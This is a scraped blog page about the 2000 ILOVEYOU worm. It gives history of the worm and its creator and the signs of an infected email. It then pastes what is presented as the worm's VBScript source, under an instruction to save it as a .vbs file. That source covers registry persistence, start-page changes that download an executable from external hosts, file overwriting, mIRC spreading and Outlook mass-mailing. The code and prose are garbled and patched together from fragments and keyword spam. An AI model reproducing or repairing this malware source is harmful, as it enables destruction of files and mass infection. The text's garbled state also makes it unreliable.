I Love You Virus

admin

Melissa.A, Friday the 13th are viruses that we’ve reviewed until now on this blog. Today we’re going to talk about ‘ILoveYou’, so famous that it’s almost not even necessary to present it.

Lessons Learned from the ILOVEYOU Virus/Worm. May 9th, 2000 - Chuck Flink (Feedback Appreciated!) First lesson: make sure your software is up to date!In several articles over the past few months, I've repeated pointed out that technology is evolving so rapidly that software is no longer really a product. May 04, 2015 The virus came to be known as the ILOVEYOU worm, or LOVEBUG. At the time, it was the biggest computer virus the world had ever seen, and the 'first successful use of social engineering,' according. The Smithsonian Institute named the 'I Love You' virus the 10th most destructive computer virus in history. As for De Guzman, although he was initially arrested by authorities, he was later released and all charges against him were dropped, primarily because there were no laws against writing malware at the time. The Filipino creator of the 'I Love You' virus, sometimes known as “Love Bug,” says he only did it so he could steal passwords and access the internet for free. A BBC writer named Geoff White tracked down Onel De Guzman in Manila. De Guzman is the creator of one of the most destructive computer viruses in history, but says he never meant for the virus to spread globally.

‘ILoveYou’ appeared in the year 2000, from the Philippines and was capable of infecting millions of computers and important institutions such as the Pentagon, CIA and British Parliament.

I Love You Viruses

This ‘loving’ virus is a very dangerous and destructive worm that uses a so-called love letter as a hook to get the user to open the file that contains the virus and affect the computer.

How to Recognize the ‘ILoveYou’ Virus

You can learn to realize if the ‘ILoveYou’ virus reaches you in an email by looking for the following characteristics:

– Subject: ILOVEYOU

I love you virus downloadI Love You Virus

– Content: Kindly check the attached LOVELETTER from me

– Attachment: LOVE-LETTER-FOR-YOU.txt.vbs

Love

Iloveyou Virus Download Windows

I Love You Virus

Another alarming signal is receiving the LOVE-LETTER-FOR-YOU file.HTM through a chat.

I Love You Virus Source Code

I Love You Virus

Were you ever infected by ‘ILoveYou’?

Irene De Guzman I Love You Virus

More | How to remove ‘ILoveYou’ virus

Iloveyou Source Code

May 16th, 2016

I Love You Virus Document

Never
Not a member of Pastebin yet?Sign Up, it unlocks many cool features!
  1. | $$_____/ | $$| $$ | $$_____/ | $$|__/ | $$
  2. | $$ /$$$$$$ | $$| $$ /$$$$$$ /$$$$$$$ | $$ /$$$$$$$ /$$ /$$$$$$
  3. | $$$$$|____ $$| $$| $$ /$$__ $$| $$__ $$ | $$$$$ /$$__ $$| $$|_ $$_/
  4. | $$__/ /$$$$$$$| $$| $$| $$$$$$$$| $$ $$ | $$__/ | $$ | $$| $$ | $$
  5. | $$ /$$__ $$| $$| $$| $$_____/| $$ | $$ | $$ | $$ | $$| $$ | $$ /$$
  6. | $$ | $$$$$$$| $$| $$| $$$$$$$| $$ | $$ | $$$$$$$$| $$$$$$$| $$ | $$$$/
  7. |__/ _______/|__/|__/ _______/|__/ |__/ |________/ _______/|__/ ___/
  8. (Copy Text beneath this lineand save it as a .vbs file.)
  9. rem barok -loveletter(vbe) <i hate go to school>
  10. rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
  11. dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
  12. ctr=0
  13. Set fso = CreateObject('Scripting.FileSystemObject')
  14. set file = fso.OpenTextFile(WScript.ScriptFullname,1)
  15. main()
  16. OnErrorResumeNext
  17. set wscr=CreateObject('WScript.Shell')
  18. rr=wscr.RegRead('HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout')
  19. wscr.RegWrite 'HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout',0,'REG_DWORD'
  20. Set dirwin = fso.GetSpecialFolder(0)
  21. Set dirtemp = fso.GetSpecialFolder(2)
  22. c.Copy(dirsystem&'MSKernel32.vbs')
  23. c.Copy(dirsystem&'LOVE-LETTER-FOR-YOU.TXT.vbs')
  24. html()
  25. listadriv()
  26. sub regruns()
  27. Dim num,downread
  28. 'HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMSKern el32',dirsystem&'MSKernel32.vbs'
  29. 'HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunService sWin32DLL',dirwin&'Win32DLL.vbs'
  30. downread=regget('HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerDownload Directory')
  31. downread='c:'
  32. if (fileexist(dirsystem&'WinFAT32.exe')=1) then
  33. num = Int((4 * Rnd) + 1)
  34. regcreate 'HKCUSoftwareMicrosoftInternet ExplorerMainStart
  35. Page','http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm
  36. elseif num = 2 then
  37. regcreate 'HKCUSoftwareMicrosoftInternet ExplorerMainStart Page','http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw
  38. erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe'
  39. regcreate 'HKCUSoftwareMicrosoftInternet ExplorerMainStart
  40. Page','http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd
  41. elseif num = 4 then
  42. regcreate 'HKCUSoftwareMicrosoftInternet ExplorerMainStart
  43. Page','http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD
  44. GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN -BUGSFIX.exe'
  45. endif
  46. if (fileexist(downread&'WIN-BUGSFIX.exe')=0) then regcreate
  47. 'HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunWIN-BU GSFIX',downread&'WIN-BUGSFIX.exe'
  48. regcreate 'HKEY_CURRENT_USERSoftwareMicrosoftInternet
  49. endif
  50. sub listadriv
  51. Dim d,dc,s
  52. ForEach d in dc
  53. folderlist(d.path&')
  54. Next
  55. endsub
  56. OnErrorResumeNext
  57. set f = fso.GetFolder(folderspec)
  58. foreach f1 in fc
  59. ext=lcase(ext)
  60. if (ext='vbs') or (ext='vbe') then
  61. ap.write vbscopy
  62. elseif(ext='com') or (ext='exe') or (ext='dll') or (ext='bat') or (ext='reg') or (ext='mdl') then
  63. ap.write vbscopy
  64. bname=fso.GetBaseName(f1.path)
  65. cop.copy(folderspec&'&bname&'.vbs') fso.DeleteFile(f1.path)
  66. set ap=fso.OpenTextFile(f1.path,2,true)
  67. ap.close
  68. cop.copy(f1.path&'.vbs')
  69. elseif(ext='mp3') or (ext='mp2') then
  70. mp3.write vbscopy
  71. set att=fso.GetFile(f1.path)
  72. endif
  73. if (s='mirc32.exe') or (s='mlink32.exe') or (s='mirc.ini') or (s='script.ini') or (s='mirc.hlp') then
  74. set scriptini=fso.CreateTextFile(folderspec&'script.ini') scriptini.WriteLine '[script]'
  75. scriptini.WriteLine '; Please dont edit this script... mIRC will corrupt, if mIRC will'
  76. scriptini.WriteLine ' corrupt... WINDOWS will affect and will not run correctly. thanks'
  77. scriptini.WriteLine ';Khaled Mardam-Bey'
  78. scriptini.WriteLine ';'
  79. scriptini.WriteLine 'n1= /if ( $nick $me ) { halt }' scriptini.WriteLine 'n2= /.dcc send $nick
  80. scriptini.WriteLine 'n3=}'
  81. eq=folderspec
  82. endif
  83. endsub
  84. OnErrorResumeNext
  85. set f = fso.GetFolder(folderspec)
  86. foreach f1 in sf
  87. folderlist(f1.path)
  88. endsub
  89. Set regedit = CreateObject('WScript.Shell')
  90. endsub
  91. Set regedit = CreateObject('WScript.Shell')
  92. endfunction
  93. OnErrorResumeNext
  94. if (fso.FileExists(filespec)) Then
  95. else
  96. endif
  97. endfunction
  98. OnErrorResumeNext
  99. if (fso.GetFolderExists(folderspec)) then
  100. else
  101. endif
  102. endfunction
  103. OnErrorResumeNext
  104. dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
  105. set out=WScript.CreateObject('Outlook.Application')
  106. for ctrlists=1 to mapi.AddressLists.Count
  107. x=1
  108. regv=regedit.RegRead('HKEY_CURRENT_USERSoftwareMicrosoftWAB'&a) if (regv=') then
  109. endif
  110. for ctrentries=1 to a.AddressEntries.Count
  111. regad='
  112. regad=regedit.RegRead('HKEY_CURRENT_USERSoftwareMicrosoftWAB'&malead )
  113. set male=out.CreateItem(0)
  114. male.Subject = 'ILOVEYOU'
  115. male.Body = vbcrlf&'kindly check the attached LOVELETTER coming from me.'
  116. male.Attachments.Add(dirsystem&'LOVE-LETTER-FOR-YOU.TXT.vbs') male.Send
  117. 'HKEY_CURRENT_USERSoftwareMicrosoftWAB'&malead,1,'REG_DWORD'endif
  118. next
  119. 'HKEY_CURRENT_USERSoftwareMicrosoftWAB'&a,a.AddressEntries.Count else
  120. 'HKEY_CURRENT_USERSoftwareMicrosoftWAB'&a,a.AddressEntries.Count endif
  121. Set out=Nothing
  122. endsub
  123. OnErrorResumeNext
  124. dta1='<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS -
  125. LOVELETTER@-@>'&vbcrlf& _ '<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
  126. @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>'&vbcrlf& _ '<META NAME=@-@Description@-@
  127. CONTENT=@-@simple but i think this is good...@-@>'&vbcrlf& _
  128. ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.
  129. 'ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. HTM#-#,#-#main#-#)@-@
  130. BGCOLOR=@-@#FF9933@-@>'&vbcrlf& _
  131. '<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to
  132. '<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
  133. BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQU EE> '&vbcrlf& _
  134. '<SCRIPT language=@-@JScript@-@>'&vbcrlf& _ '<!--?-??-?'&vbcrlf& _
  135. hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}'&vbcrl f& _
  136. '<?-?SCRIPT>'&vbcrlf& _
  137. '<SCRIPT LANGUAGE=@-@VBScript@-@>'&vbcrlf& _ '<!--'&vbcrlf& _
  138. 'dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit'&vbcrlf& _ 'aw=1'&vbcrlf& _
  139. dta2='set fso=CreateObject(@-@Scripting.FileSystemObject@-@)'&vbcrlf& _
  140. 'set dirsystem=fso.GetSpecialFolder(1)'&vbcrlf& _ 'code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))'&vbcrlf& _
  141. 'code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))'&vbcrlf& _ 'code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))'&vbcrlf& _ 'set
  142. wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)'&vbcrlf& _
  143. 'wri.close'&vbcrlf& _
  144. 'if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then'&vbcrlf& _ 'if (err.number=424) then'&vbcrlf& _
  145. 'end if'&vbcrlf& _
  146. 'document.write @-@ERROR: can#-#t initialize ActiveX@-@'&vbcrlf& _ 'window.close'&vbcrlf& _
  147. 'end if'&vbcrlf& _
  148. 'Set regedit = CreateObject(@-@WScript.Shell@-@)'&vbcrlf& _
  149. @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^
  150. -^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@'&vbcrlf& _ '?-??-?-->'&vbcrlf& _
  151. dt1=replace(dta1,chr(35)&chr(45)&chr(35),'')
  152. dt1=replace(dt1,chr(64)&chr(45)&chr(64),'') dt4=replace(dt1,chr(63)&chr(45)&chr(63),'/')
  153. dt2=replace(dta2,chr(35)&chr(45)&chr(35),'')
  154. dt2=replace(dt2,chr(64)&chr(45)&chr(64),'') dt3=replace(dt2,chr(63)&chr(45)&chr(63),'/')
  155. set fso=CreateObject('Scripting.FileSystemObject')
  156. lines=Split(c.ReadAll,vbcrlf)
  157. for n=0 toubound(lines)
  158. lines(n)=replace(lines(n),'',chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),'',chr(93)+chr(45)+chr(93))
  159. lines(n)=replace(lines(n),',chr(37)+chr(45)+chr(37)) if (l1=n) then
  160. else
  161. lines(n)=chr(34)+lines(n)+chr(34)&'&vbcrlf& _'endif
  162. set b=fso.CreateTextFile(dirsystem+'LOVE-LETTER-FOR-YOU.HTM') b.close
  163. set d=fso.OpenTextFile(dirsystem+'LOVE-LETTER-FOR-YOU.HTM',2) d.write dt5
  164. d.write vbcrlf
  165. d.close

I Love You Virus Wiki

RAW Paste Data